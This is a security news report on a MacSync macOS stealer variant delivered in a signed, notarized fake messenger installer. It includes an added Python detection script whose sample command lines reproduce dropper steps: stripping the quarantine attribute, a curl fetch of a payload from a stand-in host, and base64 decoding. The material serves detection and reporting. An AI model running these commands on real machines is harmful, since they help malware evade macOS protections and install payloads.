Jamf finds MacSync macOS stealer delivered in signed, notarized Swift installer

Cybersecurity researchers at Jamf reported the discovery of a new variant of the macOS information stealer MacSync delivered inside a code-signed, notarized Swift application that posed as a messaging app installer in a disk image named zk-call-messenger-installer-3.9.2-lts.dmg hosted on zkcall[.]net/download.

The signed and notarized installer could run without being blocked by built-in controls such as Gatekeeper or XProtect, and was observed prompting users to right-click and open the app to bypass safeguards; Apple has revoked the associated code signing certificate.

Jamf researchers said the Swift-based dropper checks for internet connectivity, enforces a minimum execution interval of about 3,600 seconds, removes quarantine attributes and validates files before execution, then downloads and runs an encoded payload through a helper component; analysts also noted deviations in the curl command flags, including the use of -fL and -sS and the --noproxy option.
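As an added example (not code from Jamf or the report), the following Python turns the dropper behaviours described above into simple detection logic over process command lines: quarantine-attribute removal via xattr, a curl invocation combining -fL, -sS and --noproxy, and base64 decoding. The sample command lines and the example.invalid URL are constructed for the demonstration.

```python
import shlex
from os.path import basename

SEPARATORS = {"|", "||", "&&", ";"}  # pipeline/command separators left as tokens by shlex

def _segments(cmdline):
    """Split a shell command line into one argv list per pipeline stage."""
    segs, cur = [], []
    for tok in shlex.split(cmdline, posix=True):
        if tok in SEPARATORS:
            if cur:
                segs.append(cur)
            cur = []
        else:
            cur.append(tok)
    return segs + ([cur] if cur else [])

def _short_flags(argv):
    """Letters of single-dash options, so '-fL -sS' yields {'f','L','s','S'}."""
    return {ch for a in argv[1:] if a.startswith("-") and not a.startswith("--") for ch in a[1:]}

def classify(cmdline):
    """Return the set of indicator tags the command line matches (empty if none)."""
    tags = set()
    for argv in _segments(cmdline):
        prog, flags = basename(argv[0]), _short_flags(argv)
        # 'xattr -d com.apple.quarantine <path>' or 'xattr -c <path>' strips Gatekeeper's quarantine flag
        if prog == "xattr" and (("d" in flags and "com.apple.quarantine" in argv) or "c" in flags):
            tags.add("quarantine_removed")
        # the flag set noted in the report: -f -L -s -S together with --noproxy
        if prog == "curl" and {"f", "L", "s", "S"} <= flags and any(a.startswith("--noproxy") for a in argv):
            tags.add("curl_fL_sS_noproxy")
        if prog == "base64" and (flags & {"d", "D"} or "--decode" in argv):
            tags.add("base64_decode")
    return tags

# Constructed sample telemetry, not indicators from the campaign.
SAMPLE_CMDLINES = [
    "xattr -d com.apple.quarantine /Volumes/Installer/Installer.app",
    "curl -fL -sS --noproxy '*' https://example.invalid/stage2 -o /tmp/.s",
    "base64 -D -i /tmp/.s -o /tmp/.p",
    "curl -fsSL https://example.invalid/legit.pkg -o /tmp/legit.pkg",  # no --noproxy: not flagged
    "xattr -l /Applications/Safari.app",                               # read-only: not flagged
]

def scan(cmdlines):
    """Return (cmdline, sorted tags) for every line matching at least one indicator."""
    return [(c, sorted(classify(c))) for c in cmdlines if classify(c)]

if __name__ == "__main__":
    for cmd, tags in scan(SAMPLE_CMDLINES):
        print(", ".join(tags), "<-", cmd)
```

Only the three lines reproducing the described behaviours are flagged; the ordinary curl download and the read-only xattr listing pass, which is the distinction a detection rule built on these flags needs to keep.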

The researchers found the disk image was artificially inflated to about 25.5 MB by embedding unrelated PDF documents, and that the Base64-encoded payload corresponds to MacSync, a rebranded version of Mac.c that first appeared in April 2025.

Jamf noted that other campaigns have used code-signed DMG files mimicking Google Meet to deliver different macOS stealers such as Odyssey, while some actors continue to use unsigned disk images to deliver DigitStealer, highlighting a trend toward distribution methods that attempt to make malicious apps appear legitimate.